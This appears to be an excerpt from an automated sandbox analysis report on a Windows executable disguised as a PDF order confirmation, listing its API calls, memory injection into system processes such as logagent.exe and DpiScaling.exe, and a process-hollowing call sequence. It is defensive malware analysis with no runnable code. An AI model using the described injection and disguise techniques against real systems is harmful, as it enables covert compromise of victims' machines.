,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_tr 3_2_00410586
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, 3_2_0040728F
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 3_2_0040477E
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, 3_2_00403325
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 3_2_00412BEE
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10548C1E getenv,FindFirstFileA,FindClose,GetLastError,GetLastError,FindClose, 3_2_10548C1E
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10544CB4 FindFirstFileW, 3_2_10544CB4
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_1055457D FindFirstFileW,FindNextFileW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,FindClose, 3_2_1055457D
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_1054610D _EH_prolog,socket,connect,_CxxThrowException,FindFirstFileW,_CxxThrowException,FindNextFileW,_CxxThrowException,_CxxThrowException,FindClose,atoi,_CxxThrowException,atoi,FindClose,RtlExitUserThread, 3_2_1054610D
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10546599 FindFirstFileW,FindNextFileW,FindClose, 3_2_10546599
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10548EAA getenv,FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindClose,FindClose, 3_2_10548EAA
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10551F15 FindFirstFileW, 3_2_10551F15
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00403C4A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$cha 3_2_00403C4A
Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310315497.00000000007A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310315497.00000000007A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWpp.com
Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310005988.0000000000775000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8{%SystemRoot%\system32\mswsock.dll
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress, 3_2_00409908
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_105410AC mov eax, dword ptr fs:[00000030h] 3_2_105410AC
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_105410AC mov eax, dword ptr fs:[00000030h] 3_2_105410AC

HIPS / PFW / Operating System Protection Evasion
barindex
Writes to foreign memory regions
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 940000 Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 9D0000 Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 9E0000 Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 9F0000 Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: C00000 Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: C10000 Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 950000 Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 960000 Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 970000 Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 10540000 Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 980000 Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 990000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 5F0000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 880000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: C50000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 800000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 810000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 820000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 830000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 840000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 850000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 10540000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 860000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 870000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 1000000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 1010000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 4BA0000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3060000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3070000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3080000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3090000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 30A0000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 30B0000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 10540000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 30C0000 Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 30D0000 Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 10540000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 940000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 9D0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 9E0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 9F0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: C00000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: C10000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 950000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 960000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 970000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 980000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 990000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 10540000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 5F0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 880000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: C50000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 800000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 810000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 820000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 830000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 840000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 850000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 860000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 870000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 10540000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 1000000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 1010000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 4BA0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 3060000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 3070000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 3080000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 3090000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 30A0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 30B0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 30C0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 30D0000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 10540000 value starts with: 4D5A Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 10540000 value starts with: 4D5A Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 10540000 value starts with: 4D5A Jump to behavior
Contains functionality to inject code into remote processes
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0040F219 _EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread, 3_2_0040F219
Creates a thread in another existing process (thread injection)
